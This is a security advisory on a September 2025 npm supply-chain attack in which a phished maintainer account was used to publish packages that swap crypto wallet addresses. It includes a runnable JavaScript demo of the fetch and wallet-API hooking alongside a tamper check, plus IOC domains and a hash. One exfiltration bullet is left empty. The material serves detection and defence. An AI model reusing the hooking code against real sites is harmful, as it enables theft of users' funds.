
npm Supply-Chain Attack via Phishing Campaign

September 12th, 2025

High

Our Cyber Threat Intelligence Unit has identified an active supply-chain attack in the npm ecosystem. Threat actors compromised a maintainer account through phishing emails impersonating npm support and used the stolen credentials to publish malicious versions of widely used packages. The injected malware hooks browser and Web3 wallet APIs, manipulates API calls and responses, and replaces cryptocurrency wallet addresses before transactions are signed. Although the malicious versions were live only for a short window (approximately 9:00–11:30 a.m. ET on September 8, 2025), the popularity of the affected packages creates significant downstream risk and poses a serious threat to organizations that installed or updated dependencies during that window.

Technical Details

  • Attack Type: Supply-chain compromise / client-side crypto-stealer.

  • Severity: High.

  • Delivery: Malicious npm package versions published after maintainer credential theft via phishing (sender support@npmjs[.]help, lookalike domain npmjs[.]help).

  • Technique:

    • Injected JavaScript hooks into fetch, XMLHttpRequest, and wallet APIs (e.g., window.ethereum).

    • Intercepts web responses and DOM elements containing crypto addresses, rewriting destinations to attacker wallets.

    • Credential harvesting via phishing portal with exfiltration to:

  • Malware Behavior:

    • API hooking for browser-based crypto theft.

    • Exfiltration of developer credentials.

    • Secondary use of obfuscated inline JavaScript in index.js.

  • Affected Components:

    • npm ecosystem (core utility packages, see IOC section).

    • Browser runtimes / client-side JS.

    • Cryptocurrency wallets (MetaMask and other Web3 providers).
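The Technique bullets above describe API hooking in the abstract. The following is an added example (not code from this advisory and not the malware itself) that models the technique in reduced form and pairs it with a runtime integrity check a site could use to detect it. Everything here is constructed: `win` stands in for a browser window so the file runs under Node, the addresses are placeholders, and `makeWindow`, `installHook`, `snapshot` and `findTamperedApis` are names chosen for this illustration.

```javascript
// Added example, not code from the advisory or from the malware: a reduced
// model of the fetch / wallet-API hooking described in the Technique section,
// beside an integrity check that detects it. "win" is a constructed stand-in
// for a browser window so the file runs under Node; addresses are placeholders.

const ADDR_RE = /0x[0-9a-fA-F]{40}/g;

// Constructed page environment: a fetch that returns JSON carrying a payee
// address, and a minimal EIP-1193 style provider in the role of window.ethereum.
function makeWindow() {
  const win = {};
  win.fetch = async function fetch() {
    return { json: async () => ({ payee: '0x1111111111111111111111111111111111111111' }) };
  };
  win.ethereum = {
    request: async function request(req) {
      // A real provider would prompt the user here; we just echo the target.
      return { method: req.method, to: req.params[0].to };
    },
  };
  return win;
}

// Defender side, step 1: capture references to the real APIs as early as
// possible (ideally from the first script that runs on the page).
function snapshot(win) {
  return { fetch: win.fetch, ethRequest: win.ethereum && win.ethereum.request };
}

// Replace every EVM-style address inside a JSON-serialisable value.
function rewriteAddresses(value, attackerAddr) {
  return JSON.parse(JSON.stringify(value).replace(ADDR_RE, attackerAddr));
}

// Attacker technique, reduced to its essence: wrap fetch so every JSON response
// has wallet addresses rewritten, and wrap ethereum.request so a transaction's
// "to" field is swapped just before the wallet signs it.
function installHook(win, attackerAddr) {
  const origFetch = win.fetch;
  win.fetch = async function fetch(...args) {
    const res = await origFetch.apply(this, args);
    const origJson = res.json.bind(res);
    res.json = async () => rewriteAddresses(await origJson(), attackerAddr);
    return res;
  };
  const origRequest = win.ethereum.request;
  win.ethereum.request = async function request(req) {
    if (req.method === 'eth_sendTransaction' && req.params && req.params[0]) {
      req = { ...req, params: [{ ...req.params[0], to: attackerAddr }] };
    }
    return origRequest.call(this, req);
  };
}

// Defender side, step 2: compare the live API objects against the snapshot.
// Any mismatch means something redefined them after the snapshot was taken.
function findTamperedApis(win, snap) {
  const tampered = [];
  if (win.fetch !== snap.fetch) tampered.push('fetch');
  if (win.ethereum && win.ethereum.request !== snap.ethRequest) tampered.push('ethereum.request');
  return tampered;
}

// Stand-alone walkthrough: clean page first, then the same page after hooking.
async function demo() {
  const attacker = '0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef';
  const win = makeWindow();
  const snap = snapshot(win);
  const before = {
    tampered: findTamperedApis(win, snap),
    payee: (await (await win.fetch('/api/invoice')).json()).payee,
  };
  installHook(win, attacker);
  const after = {
    tampered: findTamperedApis(win, snap),
    payee: (await (await win.fetch('/api/invoice')).json()).payee,
    signedTo: (await win.ethereum.request({
      method: 'eth_sendTransaction',
      params: [{ to: '0x2222222222222222222222222222222222222222', value: '0x1' }],
    })).to,
  };
  return { before, after };
}

demo().then(r => console.log(JSON.stringify(r, null, 2)));
```

The identity comparison only works if the snapshot is taken before any third-party bundle runs, which in practice means a small inline script at the top of the document; a hook installed earlier than the snapshot is invisible to it. It is a cheap canary, not a substitute for keeping the malicious package versions out of the build.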


Impact

  • Cryptocurrency Diversion: Browser-based address swapping enables theft at the signing stage.

  • Supply-Chain Reach: The affected packages collectively receive billions of weekly downloads, so exposure extends to projects that pull them in only as transitive dependencies.

  • Limiting Factors: Only projects that performed fresh installs or regenerated lockfiles during the roughly two-hour compromise window pulled the malicious versions; installs reproduced from a lockfile pinned before the window were not affected.

Detection Method

  • Network Monitoring: Flag outbound connections to websocket-api2[.]publicvm.com and to domains mimicking npm support (e.g., npmjs[.]help).

  • Dependency Review:

    • Audit package-lock.json / yarn.lock for the malicious package versions. Lockfile entries carry no timestamps, so use commit history and CI logs to identify lockfiles created or regenerated between Sep 8, 09:00–11:30 a.m. ET.

    • Validate resolved versions and integrity hashes against known-clean package versions.

  • Static Analysis: Scan bundled JS for:

    • Unexpected hooks into fetch, XMLHttpRequest, and window.ethereum.

    • Obfuscated inline code strings (e.g., checkethereumw).

  • Build Logs: Review npm install and system audit logs for anomalies during the compromise window.

Indicators of Compromise

Type            Indicator
SHA-256 Hash    c00a2d757349bfff4d7e0665446101d2ab46a1734308cb3704f93d20dc7aac23


Recommendations

  • Containment: Rebuild production artifacts from verified commits and lockfiles that predate September 8. Pin known-clean versions, clear local and CI npm caches so the malicious tarballs cannot be reused, then regenerate the lockfiles and redeploy.

  • Hardening: Enforce phishing-resistant 2FA (FIDO2/WebAuthn security keys) for npm maintainer accounts; SMS and TOTP codes can be relayed through a phishing page, security keys cannot. Implement organization-level package ownership and restricted publishing rights.

  • Monitoring: Continuously monitor for npm supply-chain anomalies. Set up alerts for outbound connections to known command-and-control servers and suspicious npm lookalikes.

  • Phishing Awareness: Roll out phishing-awareness training for developers who manage registry accounts, using this campaign's npm-support impersonation as a worked example.

Conclusion

This incident highlights the systemic risk present in software supply chains. By compromising a single maintainer account, attackers were able to distribute malicious code downstream to billions of potential installations. Although the roughly two-hour exposure window and the quick community response limited the damage, the campaign illustrates how quickly trust in a widely used registry can be weaponized. We urge organizations to prioritize maintainer account security, reproducible builds from pinned lockfiles, and ongoing dependency monitoring to reduce exposure to similar large-scale compromises in the future.
